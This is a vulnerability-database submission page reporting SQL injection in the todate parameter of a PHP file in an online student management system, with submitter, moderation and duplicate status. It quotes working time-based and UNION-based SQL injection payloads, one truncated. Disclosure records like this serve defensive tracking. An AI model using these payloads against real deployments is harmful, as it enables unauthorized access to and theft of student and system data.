Submeter #101034: SQL injection vulnerability exists in todate parameter of Online student management systeminformação

TítuloSQL injection vulnerability exists in todate parameter of Online student management system
DescriçãoSQL injection vulnerability exists in todate parameter of between-date-reprtsdetails.php file of Online student management system Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload:todate=1';SELECT SLEEP(5)#&fromdate=1 or todate=1' AND (SELECT 5013 FROM (SELECT(SLEEP(5)))OJRy)-- TvQM&fromdate=1 or todate=1' UNION ALL SELECT NULL,CONCAT(0x716b707871,0x4a615072586f44506b476b557a4f50564c596c6e72666a7775526
Fonte⚠️ https://github.com/E1CHO/cve_hub/blob/main/Online%20student%20management%20system%20pdf/Online%20student%20management%20system%20sql%20vlun%202.pdf
Utilizador
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Submissão13/03/2023 14h50 (há 3 anos)
Moderação13/03/2023 18h26 (4 hours later)
EstadoDuplicado
Entrada VulDB222665 [SourceCodester Online Student Management System 1.0 between-date-reprtsdetails.php fromdate/todate Injeção SQL]
Pontos0

VoltarVisão GeralPróximo

Want to stay up to date on a daily basis?

Enable the mail alert feature now!